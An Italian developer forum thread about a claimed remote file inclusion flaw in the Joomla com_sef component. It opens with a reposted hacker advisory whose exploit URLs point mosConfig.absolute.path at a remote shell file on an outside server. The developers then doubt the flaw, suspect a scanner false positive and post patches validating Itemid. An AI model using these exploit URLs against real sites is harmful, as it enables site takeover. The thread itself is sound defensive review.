Joomla Component (com_sef) RFI

[vamba]

Segnalazione da prendere con cautela, infatti non sia hanno ulteriori informazioni se tale problematica è attiva nelle vesioni 1.0.x di Joomla o successive.

Codice: [Seleziona]

==========================================================
Joomla Component (com_sef) RFI
===========================================================

                                          WWw.HaCkTeacH.oRg/cc
                                                                                         
+===================================================================================+
[?]Joomla Component (com_sef) RFI
+===================================================================================+
    [?] My home:              [http://HaCkTeCh.Org/cc           ]
    [?] For Ask:              [F5w@hotmail.com                   ]
    [?] Script:               [     joomla                ]
    [?] home Script           [ http://www.joomla.com/app             ]
    [?] Language:             [ PHP                              ]
    [?] Founder:              [ Li0n-PaL                         ]
    [?] Gr44tz to:            [ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]

===[ Exploit  ]===
http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]

DeMo ~

http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00


EnJoY o_O

---------------------------------------------------------

./exit



[mau_develop]

mmhhh... questa direi di sì .... almeno dal codice sembra possibile...

M.

la questione dovrebbe essere questa:

il metodo getVar() va ad estrarre dall'uri la variabile in argomento, accetta un default ma non un casting (??!!)

alla riga 89 di sef.router.php c'è questo

     // Get the itemid from the URI
            $Itemid = $uri->getVar('Itemid');

emmhh, o mi sfugge qualche precedente controllo o questo è un buco

ma c'è un'altro punto simile poco dopo...

.. a me sembra non funzionare nella pratica ma potrebbe essere la conf di sg

Marco? what about?


M.

[vamba]

mmhhh... questa direi di sì .... almeno dal codice sembra possibile...

Concordo ...
Resta, comunque, il problema che ultimamente queste segnalazioni non sono molto dettagliate e non si capisce bene a quale versione della componente facciano riferimento.

[mau_develop]

ostrega, ci siamo sovrapposti guarda sopra e dimmi anche tu

M.

ho guardato un po' più approfonditamente, secondo me l'hanno trovata con qualche tool che gli ha fornito la stringa in automatico... probabilmente si può far qualcosa ma non come dicono loro.
I tool trovano i falsi positivi, ovvero come in qs caso il tool ha lanciato la stringa, dal server è tornato un 200... per lui è vulnerabilità...

io ho fixato così (per ora)

alla riga 89 di sef.router.php c'è questo
// Get the itemid from the URI
$Itemid = $uri->getVar('Itemid');

sostituito da questo

// Get the itemid from the URI
is_numeric( $uri->getVar('Itemid') ) ? $Itemid = $uri->getVar('Itemid') : $Itemid='';

subito dopo viene rifatta la getVar ma solo se è risultata null... nel mio caso se nn è numerica è vuota e non null (dovrebbe funzionare il ragionamento )

stessa cosa intorno a riga 260 di joomsef.php

[mmleoni]

ciao a tutti,
un RFI su Itemid mi sembra per lo meno improbabile... 
perché un'inclusione funzioni serve, appunto, qualcosa che includa ciò che le è passato, tipicamente un require($uri->getVar('sonoOttimista')). dato che Itemid è usato per capire la voce di menù attiva, e non per caricare codice, al massimo potrebbe essere oggetto di SQL injection, ma non ho il codice davanti.

quanto all'API di J1.0 non mi ricordo più niente 

ciao,
marco

[mau_develop]

testando con 2 scanner uno non vede nulla, l'altro (commerciale) mi segnala la vulnerabilità..

ma non è la sola, + o - ovunque ci sia sto itemid segnala problemi.
In realtà penso che sia come dice Marco, ovvero abbastanza improbabile riuscire a fare quell'inclusione.

Secondo te è meglio lasciare perdere o mandarlo in errore come ho fatto sopra?

M.

[mmleoni]

mah, io l'avrei scritta così:

Codice: [Seleziona]

$Itemid = (is_numeric( $uri->getVar('Itemid') ) ? intval($uri->getVar('Itemid')) : 0);
ma senza codice davanti non so dire altro.

ciao,
marco